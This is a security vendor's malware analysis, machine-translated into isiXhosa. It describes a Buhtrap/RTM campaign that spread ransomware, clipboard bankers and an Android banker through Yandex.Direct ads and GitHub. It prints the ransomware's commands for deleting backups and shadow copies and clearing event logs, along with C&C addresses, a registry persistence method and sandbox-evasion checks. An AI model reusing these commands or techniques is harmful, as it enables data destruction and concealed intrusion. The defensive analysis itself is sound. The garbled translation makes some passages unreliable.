Ukujolisa ababhali-mali kuhlaselo lwe-cyber, ungasebenzisa amaxwebhu omsebenzi abawakhangelayo kwi-Intanethi. Oku kuqikelelwa yile nto isenziwa liqela le-cyber kwezi nyanga zimbalwa zidlulileyo, lisasaza ii-backdoors ezaziwayo. и , kunye nee-encryptors kunye nesoftware yobusela be-cryptocurrencies. Uninzi lweethagethi zibekwe eRashiya. Uhlaselo lwenziwe ngokubeka intengiso ekhohlakeleyo kwiYandex.Direct. Amaxhoba anokubakho abhekiswa kwiwebhusayithi apho acelwa ukuba akhuphele ifayile ekhohlakeleyo eguqulwe njengetemplate yoxwebhu. Yandex isuse intengiso ekhohlakeleyo emva kwesilumkiso sethu.
Ikhowudi yomthombo weBuhtrap ikhutshwe kwi-intanethi kwixesha elidlulileyo ukuze nabani na akwazi ukuyisebenzisa. Asinalo ulwazi malunga nokufumaneka kwekhowudi yeRTM.
Kule post siza kukuxelela indlela abahlaseli abasasaza ngayo i-malware ngokusebenzisa i-Yandex.Direct kwaye bayibambe kwi-GitHub. Isithuba siya kugqiba ngohlalutyo lobugcisa lwe-malware.
I-Buhtrap kunye ne-RTM zibuyele kwishishini
Indlela yokusasazeka kunye namaxhoba
Iintlawulo ezahlukeneyo eziziswe kumaxhoba zabelana ngendlela efanayo yokusasaza. Zonke iifayile ezinobungozi ezenziwe ngabahlaseli zibekwe kwiindawo ezimbini ezahlukeneyo zokugcina iiGitHub.
Ngokuqhelekileyo, indawo yokugcina iqulethe ifayile enobungozi ekhutshelweyo, etshintsha rhoqo. Ekubeni i-GitHub ikuvumela ukuba ujonge imbali yotshintsho kwindawo yokugcina, sinokubona ukuba yeyiphi i-malware eyasasazwa ngexesha elithile. Ukukholisa ixhoba ukuba likhuphe ifayile enobungozi, i-website blanki-shabloni24[.]ru, eboniswe kumzobo ongentla, isetyenziswe.
Uyilo lwesiza kunye nawo onke amagama eefayile ezikhohlakeleyo alandela ingqikelelo enye - iifom, iitemplates, izivumelwano, iisampuli, njl.njl. Ukuqwalasela ukuba iBuhtrap kunye ne-RTM software sele isetyenziswe ekuhlaselweni kwabagcini-mali kwixesha elidlulileyo, sicinge ukuba isicwangciso kwiphulo elitsha siyafana. Umbuzo kuphela kukuba ixhoba lifike njani kwiwebhusayithi yabahlaseli.
Ukucoca
Ubuncinci abaliqela abanokuba ngamaxhoba abagqibela kule ndawo baye batsalwa ziintengiso ezikhohlakeleyo. Ngezantsi ngumzekelo we-URL:
https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456
Njengoko unokubona kwikhonkco, isibhengezo siposwe kwiforum yobalo esemthethweni bb.f2[.]kz. Kubalulekile ukuqaphela ukuba iibhena zivele kwiindawo ezahlukeneyo, zonke zine-id yephulo elifanayo (blanki_rsya), kwaye ezininzi zinxulumene ne-accounting okanye iinkonzo zoncedo lwezomthetho. I-URL ibonisa ukuba ixhoba elinokubakho lisebenzise isicelo "sokukhuphela ifomu ye-invoyisi," exhasa i-hypothesis yethu yokuhlaselwa okujoliswe kuyo. Ngezantsi ziisayithi apho iibhena zivele khona kunye nemibuzo yokukhangela ehambelanayo.
- khuphela ifomu ye-invoyisi – bb.f2[.]kz
- ikontraki yesampula - Ipopen[.]ru
- isampuli yesikhalazo isicelo - 77metrov[.]ru
- ifomu yesivumelwano - blank-dogovor-kupli-prodazhi[.]ru
- isampuli yesicelo senkundla - zen.yandex[.]ru
- Isikhalazo sesampula - yurday[.]ru
- iifom zemvumelwano zesampula - Regforum[.]ru
- ifomu yesivumelwano - assistentus[.]ru
- Isampulu yesivumelwano seflethi - napravah[.]com
- iisampulu zezivumelwano zomthetho - avito[.]ru
Indawo ye-blanki-shabloni24[.]ru inokuthi iqwalaselwe ukuba iphumelele uvavanyo olubonakalayo olulula. Ngokwesiqhelo, intengiso ekhomba indawo ejongeka yobuchwephesha enekhonkco kwiGitHub ayibonakali ngathi yinto embi ngokucacileyo. Ukongeza, abahlaseli balayishe iifayile ezinobungozi kwindawo yokugcina kuphela ixesha elithile, mhlawumbi ngexesha lephulo. Uninzi lwexesha, indawo yokugcina ye-GitHub iqulethe i-zip engenanto okanye ifayile ye-EXE engenanto. Ngaloo ndlela, abahlaseli banokusasaza intengiso nge-Yandex.Direct kwiindawo ezinokuthi zityelelwe kakhulu ngabagcini-mali abaza ngokuphendula kwimibuzo ethile yokukhangela.
Okulandelayo, makhe sijonge kwiintlawulo ezahlukeneyo ezisasazwa ngale ndlela.
Uhlahlelo lwentlawulo
Ubalo-maxesha lokusasazwa
Iphulo elikhohlakeleyo laqala ekupheleni kuka-Okthobha ka-2018 kwaye liyasebenza ngexesha lokubhala. Ekubeni yonke indawo yokugcina yayifumaneka esidlangalaleni kwi-GitHub, siye saqulunqa ixesha elichanekileyo lokusasazwa kweentsapho ezintandathu ezahlukeneyo ze-malware (jonga umfanekiso ongezantsi). Songeze umgca obonisa ukuba ikhonkco lebhena yafunyanwa nini, njengoko kulinganiswe yi-ESET telemetry, xa kuthelekiswa nembali yegit. Njengoko ubona, oku kuhambelana kakuhle nokufumaneka komthwalo wokuhlawula kwi-GitHub. Ukungahambelani ekupheleni kukaFebruwari kunokuchazwa yinyaniso yokuba asizange sibe nenxalenye yembali yokutshintsha kuba indawo yokugcina yasuswa kwi-GitHub ngaphambi kokuba siyifumane ngokupheleleyo.
Umzobo 1. Ulandelelwano lweziganeko zokusasazwa kwe-malware.
Ikhowudi yokuSayina izatifikethi
Eli phulo lisebenzise izatifikethi ezininzi. Ezinye zasayinwa lusapho olungaphezulu kwe-malware, nto leyo ebonisa ukuba iisampuli ezahlukeneyo bezizezephulo elinye. Ngaphandle kobukho beqhosha labucala, abaqhubi abazange basayine ngokucwangcisiweyo iibhiri kwaye abazange basebenzise isitshixo kuzo zonke iisampuli. Ekupheleni kukaFebruwari 2019, abahlaseli baqala ukwenza utyikityo olungasebenziyo besebenzisa isatifikethi sikaGoogle ababengenaso isitshixo sabucala.
Zonke izatifikethi ezibandakanyekayo kwiphulo kunye neentsapho ze-malware abazisayinayo zidweliswe kwitheyibhile engezantsi.
Sikwasebenzise ezi zatifikethi zokusayina ikhowudi ukuseka amakhonkco kunye nezinye iintsapho ze-malware. Kwizatifikethi ezininzi, asifumananga iisampulu ezingakhange zihanjiswe kwindawo yokugcina ye-GitHub. Nangona kunjalo, isatifikethi se-TOV "MARIYA" sasetyenziselwa ukusayina i-malware ye-botnet , i-adware kunye nabasebenzi basezimayini. Akunakwenzeka ukuba le malware inxulunyaniswe neli phulo. Ngokunokwenzeka, isatifikethi sathengwa kwi-darknet.
Win32/Filecoder.Buhtrap
Icandelo lokuqala eliye latsala ingqalelo yethu yiWin32/Filecoder.Buhtrap esanda kufunyanwa. Le yifayile yokubini yeDelphi epakishwa ngamanye amaxesha. Isasazwe ikakhulu ngoFebruwari–Matshi ngo-2019. Iziphatha ngendlela efanele inkqubo ye-ransomware-ikhangela iidrive zasekhaya kunye neefolda zenethiwekhi kwaye ifihla iifayile ezichongiweyo. Ayifuni nxibelelwano lwe-Intanethi ukuba ibekwe esichengeni kuba ayiqhagamshelani nomncedisi ukuthumela izitshixo zoguqulelo oluntsonkothileyo. Kunoko, yongeza "uphawu" ekupheleni komyalezo wentlawulelo, kwaye iphakamisa ukusebenzisa i-imeyile okanye i-Bitmessage ukuqhagamshelana nabaqhubi.
Ukufihla izibonelelo ezininzi ezibuthathaka ngokusemandleni, iFayilecoder.Buhtrap iqhuba intambo eyenzelwe ukuvala isoftware engundoqo enokuthi ibe nabaphathi beefayile ezivulekileyo eziqulethe ulwazi oluxabisekileyo olunokuphazamisa ukufihlwa. Iinkqubo ekujoliswe kuzo ikakhulu ziinkqubo zolawulo lwedathabheyisi (DBMS). Ukongeza, iFayilecoder.Buhtrap icima iifayile zelog kunye nee-backups ukwenza ukubuyisela idatha kunzima. Ukwenza oku, sebenzisa iskripthi sebhetshi esingezantsi.
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
I-Filecoder.Buhtrap isebenzisa inkonzo esemthethweni ye-intanethi ye-IP Logger eyenzelwe ukuqokelela ulwazi malunga neendwendwe zewebhusayithi. Oku kujonge ukulandelela amaxhoba e-ransomware, eluxanduva lomgca womyalelo:
mshta.exe "javascript:document.write('');"
Iifayile zoguqulelo oluntsonkothileyo zikhethiwe ukuba azihambelani noluhlu oluthathu lokukhutshelwa. Okokuqala, iifayile ezinolu lwandiso lulandelayo azikhutshelwanga: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys kunye .ilulwane. Okwesibini, zonke iifayile apho umendo opheleleyo uqulathe uluhlu lwamagama kuluhlu olungezantsi azibandakanywanga.
.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel
Okwesithathu, amagama athile eefayile nawo akabandakanywanga kuguqulelo oluntsonkothileyo, phakathi kwawo igama lefayile yomyalezo wentlawulelo. Uluhlu lubekwe ngezantsi. Ngokucacileyo, zonke ezi ngaphandle zenzelwe ukugcina umatshini usebenza, kodwa ngokufaneleka okuncinci kwendlela.
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
Inkqubo yoguqulelo oluntsonkothileyo lwefayile
Nje ukuba iphunyeziwe, i-malware ivelisa i-512-bit ye-RSA engundoqo. I-exponent yangasese (d) kunye nemodyuli (n) ke ngoko iguqulelwe ngekhowudi enzima-coded 2048-bit isitshixo sikawonke-wonke (i-exponent yoluntu kunye nemodulus), i-zlib-packed, kunye ne-base64 encoded. Ikhowudi enoxanduva loku iboniswe kuMfanekiso 2.
Umfanekiso 2. Iziphumo zeHex-Rays zokudityaniswa kwe-512-bit ye-RSA engundoqo yenkqubo yokuvelisa.
Ngezantsi ngumzekelo wombhalo ocacileyo onesitshixo sabucala esenziweyo, esiluphawu oluncanyathiselwe kumyalezo wentlawulelo.
DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239
Isitshixo sikawonke-wonke sabahlaseli sinikwe ngezantsi.
e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD
Iifayile zifihliwe kusetyenziswa i-AES-128-CBC kunye neqhosha le-256-bit. Kwifayile nganye efihliweyo, iqhosha elitsha kunye nevektha yokuqalisa entsha iyenziwa. Ulwazi oluphambili longezwa ekupheleni kwefayile efihliweyo. Makhe siqwalasele ifomathi yefayile efihliweyo.
Iifayile ezintsonkothileyo zinesihloko esilandelayo:
Idatha yefayile yomthombo kunye nokongezwa kwexabiso lomlingo we-VEGA ifihliwe kwi-bytes yokuqala ye-0x5000. Lonke ulwazi loguqulelo oluntsonkothileyo luncanyathiselwe kwifayile enesakhiwo esilandelayo:
Isiphawuli sobungakanani befayile sinophawu olubonisa ukuba ifayile inkulu kune 0x5000 bytes ngobukhulu
- I-AES key blob = ZlibCompress(RSAEncrypt(iqhosha le-AES + IV, isitshixo sikawonke-wonke se-RSA eveliswayo))
- I-RSA key blob = ZlibCompress(RSAEncrypt(generated RSA private key, hard-coded RSA public key))
Win32/ClipBanker
IWin32/ClipBanker licandelo elasasazwa rhoqo ukusuka ekupheleni kukaOktobha ukuya ekuqaleni kukaDisemba ka-2018. Indima yayo kukubeka esweni imixholo yebhodi eqhotyoshwayo, ijonga iidilesi ze-cryptocurrency wallet. Emva kokumisela idilesi yesipaji ekujoliswe kuyo, iClipBanker iyibuyisela endaweni yayo ngedilesi ekukholelwa ukuba yeyabasebenzi. Iisampulu esizivavanyileyo azizange zifakwe bhokisi okanye zifihlwe. Ekuphela kwendlela esetyenziswayo ukufihla impatho luguqulelo oluntsonkothileyo lomtya. Iidilesi zesipaji somqhubi ziguqulelwe ngokuntsonkothileyo kusetyenziswa i-RC4. Ii-cryptocurrencies ekujoliswe kuzo yiBitcoin, imali yeBitcoin, iDogecoin, iEthereum kunye neRipple.
Ngeli xesha i-malware yayisasazeka kubahlaseli be-Bitcoin wallets, imali encinci yathunyelwa kwi-VTS, ebangela ukuthandabuza kwimpumelelo yeli phulo. Ukongeza, abukho ubungqina obubonisa ukuba ezi ntengiselwano bezinxulumene neClipBanker kwaphela.
Win32/RTM
Icandelo leWin32/RTM lasasazwa iintsuku ezininzi ekuqaleni kukaMatshi ka-2019. I-RTM yibhanki yeTrojan ebhalwe eDelphi, ejoliswe kwiinkqubo zebhanki ezikude. Kwi-2017, abaphandi be-ESET bapapashiwe yale nkqubo, inkcazelo isabalulekile. NgoJanuwari 2019, iPalo Alto Networks nayo yakhululwa .
Bhutrap Loader
Ngexesha elithile, umkhupheli wayekhona kwi-GitHub eyayingafani nezixhobo zangaphambili zeBuhtrap. Uguqukela ku https://94.100.18[.]67/RSS.php?<some_id> ukufumana inqanaba elilandelayo kwaye lilayishe ngqo kwinkumbulo. Sinokwahlula iindlela zokuziphatha ezimbini zekhowudi yesigaba sesibini. Kwi-URL yokuqala, i-RSS.php idlulise i-backdoor ye-Buhtrap ngokuthe ngqo - le backdoor ifana kakhulu nekhoyo emva kokuba ikhowudi yomthombo ivuziwe.
Okubangela umdla, sibona amaphulo amaninzi kunye neBuhtrap backdoor, kwaye kuthiwa aqhutywa ngabaqhubi abahlukeneyo. Kule meko, umahluko omkhulu kukuba i-backdoor ilayishwe ngqo kwimemori kwaye ayisebenzisi inkqubo eqhelekileyo kunye nenkqubo yokusasazwa kwe-DLL esithethe ngayo. . Ukongeza, abaqhubi batshintshe isitshixo se-RC4 esisetyenziselwa ukubethela itrafikhi yenethiwekhi kwi-C&C iseva. Kumaphulo amaninzi esiwabonileyo, abasebenzisi khange bazihluphe ngokutshintsha esi sitshixo.
Okwesibini, ukuziphatha okuntsokothileyo yayikukuba i-URL ye-RSS.php yagqithiselwa komnye umlayishi. Iphumeze i-obfuscation ethile, efana nokwakha kwakhona itheyibhile yokungenisa eguqukayo. Injongo ye-bootloader kukuqhagamshelana nomncedisi we-C&C [.]com/api/F27F84EDA4D13B15/2, thumela iilogi kwaye ulinde impendulo. Iqhuba impendulo njenge-blob, ilayishe kwimemori kwaye iyenze. Umthwalo ohlawulwayo esiwubonileyo usenza lo mlayishi wawukwafana neBuhtrap ngasemva, kodwa kunokubakho amanye amacandelo.
Android/Spy.Banker
Okubangela umdla kukuba, icandelo le-Android lafunyanwa kwindawo yokugcina iGitHub. Ebekwisebe eliphambili usuku olunye kuphela - ngomhla woku-1 kuNovemba ka-2018. Ngaphandle kokuthunyelwa kwi-GitHub, i-telemetry ye-ESET ayifumani bungqina bokuba le malware isasazwa.
Icandelo lasingathwa njengePakethe yeSicelo se-Android (APK). Icaciswe kakhulu. Indlela yokuziphatha engalunganga ifihliwe kwi-JAR efihliweyo ebekwe kwi-APK. Iguqulelwe ngokuntsonkothileyo nge-RC4 isebenzisa eli qhosha:
key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]
Isitshixo esifanayo kunye ne-algorithm zisetyenziselwa ukufihla imitya. I-JAR ikhona APK_ROOT + image/files. Ii-bytes zokuqala ezi-4 zefayile ziqulethe ubude be-JAR efihliweyo, eqala ngokukhawuleza emva kobude bebala.
Emva kokuba siyigqibile ifayile, safumanisa ukuba yayiyi-Anubis - ngaphambili ibhanki for Android. I-malware inezi mpawu zilandelayo:
- ukurekhodwa kwemakrofoni
- ukuthatha imifanekiso yesikrini
- ukufumana ulungelelwaniso lweGPS
- keylogger
- ufihlo lwedatha yesixhobo kunye nemfuno yentlawulelo
- ukuthumela i-spam
Okubangela umdla kukuba, ibhanki yasebenzisa i-Twitter njengejelo lonxibelelwano eligcinayo ukufumana enye iseva yeC&C. Isampuli esiyihlalutyayo isebenzise i-akhawunti @JonesTrader, kodwa ngexesha lokuhlalutya lalisele livaliwe.
Ibhanki iqulethe uluhlu lwezicelo ekujoliswe kuzo kwisixhobo Android. Ide kunoluhlu olufunyenwe kwisifundo seSophos. Uluhlu lubandakanya izicelo ezininzi zebhanki, iinkqubo zokuthenga kwi-intanethi ezifana ne-Amazon kunye ne-eBay, kunye neenkonzo ze-cryptocurrency.
MSIL/ClipBanker.IH
Icandelo lokugqibela elasasazwa njengenxalenye yeli phulo yi-.NET Windows executable, eyavela ngoMatshi ka-2019. Uninzi lweenguqulelo ezifundiweyo zapakishwa ngeConfuserEx v1.0.0. NjengoClipBanker, eli candelo lisebenzisa ibhodi eqhotyoshwayo. Injongo yakhe luluhlu olubanzi lwe-cryptocurrencies, kunye nezibonelelo kwi-Steam. Ukongezelela, usebenzisa inkonzo ye-IP Logger ukuze abambe isitshixo se-WIF sangasese se-Bitcoin.
IiNdlela zoKhuselo
Ukongeza kwiinzuzo ezibonelelwa yi-ConfuserEx ekuthinteleni ukulungisa ingxaki, ukulahla, kunye nokuphazamisa, icandelo libandakanya ukukwazi ukubona iimveliso ze-antivirus kunye noomatshini ababonakalayo.
Ukuqinisekisa ukuba isebenza kumatshini obonakalayo, i-malware isebenzisa i-Windows WMI yomyalelo we-WMI (WMIC) ukucela ulwazi lwe-BIOS, oluthi:
wmic bios
Emva koko inkqubo yahlula imveliso yomyalelo kwaye ijonge amagama angundoqo: VBOX, VirtualBox, XEN, qemu, bochs, VM.
Ukubona iimveliso ze-antivirus, i-malware ithumela isicelo seWindows Management Instrumentation (WMI) kwiZiko loKhuseleko leWindows usebenzisa ManagementObjectSearcher API njengoko kubonisiwe ngezantsi. Emva kokwenza ikhowudi ukusuka kwi-base64 umnxeba ujongeka ngolu hlobo:
ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')
Umzobo 3. Inkqubo yokuchonga iimveliso ze-antivirus.
Ukongeza, i-malware ijonga ukuba ingaba , isixhobo sokukhusela kuhlaselo lwebhodi eqhotyoshwayo kwaye, ukuba iyasebenza, imisa yonke imisonto kuloo nkqubo, ngaloo ndlela ikhubaza ukhuseleko.
Ukuzingisa
Inguqulelo ye-malware esiyifundileyo ikhuphela kuyo ngokwayo %APPDATA%googleupdater.exe kwaye icwangcisa uphawu "olufihliweyo" kulawulo lukaGoogle. Emva koko utshintsha ixabiso SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell kwirejista yeWindows kwaye yongeza umendo updater.exe. Ngale ndlela, i-malware iya kuphunyezwa ngalo lonke ixesha umsebenzisi engena.
Ukuziphatha kakubi
NjengoClipBanker, i-malware ibeka esweni imixholo yebhodi eqhotyoshwayo kwaye ijonge iidilesi ze-cryptocurrency wallet, kwaye xa ifunyenwe, iyibuyisela enye yeedilesi zomsebenzisi. Ngezantsi uluhlu lweedilesi ekujoliswe kuzo ngokusekelwe kwinto efunyenwe kwikhowudi.
BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL
Kuhlobo ngalunye lwedilesi kukho intetho eqhelekileyo ehambelanayo. Ixabiso le-STEAM_URL lisetyenziselwa ukuhlasela inkqubo yomphunga, njengoko kunokubonwa kwintetho eqhelekileyo esetyenziswa ukuchaza kwisithinteli:
b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b
Umjelo wokukhutshelwa
Ukongeza ekutshintsheni iidilesi kwi-buffer, i-malware ijolise kwizitshixo ze-WIF zabucala zeBitcoin, iBitcoin Core kunye ne-Electrum Bitcoin wallet. Inkqubo isebenzisa i-plogger.org njengejelo lokucoca ukufumana iqhosha labucala le-WIF. Ukwenza oku, abaqhubi bongeza idatha yesitshixo sabucala kwi-header ye-HTTP yoMsebenzisi-Agent, njengoko kuboniswe ngezantsi.
Umzobo 4. IP Logger console eneenkcukacha eziphumayo.
Abaqhubi abazange basebenzise i-iplogger.org ukukhupha izipaji. Mhlawumbi babhenele kwindlela eyahlukileyo ngenxa yomda weempawu ezingama-255 ebaleni User-Agentiboniswe kwi IP Logger web interface. Kwiisampulu esizifundileyo, enye iseva yokuphuma igcinwe kwindawo eguquguqukayo DiscordWebHook. Okumangalisayo kukuba, oku kuguquguquka kokusingqongileyo akubelwanga naphi na kwikhowudi. Oku kuphakamisa ukuba i-malware isephantsi kophuhliso kwaye uguquko lunikezelwe kumatshini wovavanyo lomsebenzisi.
Kukho omnye umqondiso wokuba inkqubo iyaphuhliswa. Ifayile yokubini ibandakanya ii-URL ezimbini ze-iplogger.org, kwaye zombini ziyabuzwa xa idatha ikhutshiwe. Kwisicelo kwenye yezi URL, ixabiso kwi-Reference field lilandelwa ngu "DEV /". Siye safumana noguqulelo olungapakishwanga kusetyenziswa iConfuserEx, umamkeli wale URL ubizwa ngokuba yiDevFeedbackUrl. Ngokusekwe kwigama eliguquguqukayo lokusingqongileyo, sikholelwa ukuba abaqhubi baceba ukusebenzisa inkonzo esemthethweni yeDiscord kunye nenkqubo yayo yokuthintela iwebhu ukuze babe izipaji ze-cryptocurrency.
isiphelo
Eli phulo ngumzekelo wokusetyenziswa kweenkonzo zentengiso ezisemthethweni ekuhlaselweni kwe-cyber. Iskimu sijolise kwimibutho yaseRashiya, kodwa asiyi kumangaliswa ukubona ukuhlaselwa okunjalo kusetyenziswa iinkonzo ezingezizo zaseRashiya. Ukunqanda ukuthotywa, abasebenzisi kufuneka baqiniseke kudumo lomthombo wesoftware abayikhuphelayo.
Uluhlu olupheleleyo lwezalathi ze-compromise kunye ne-MITER ATT&CK iimpawu ziyafumaneka .
umthombo: www.habr.com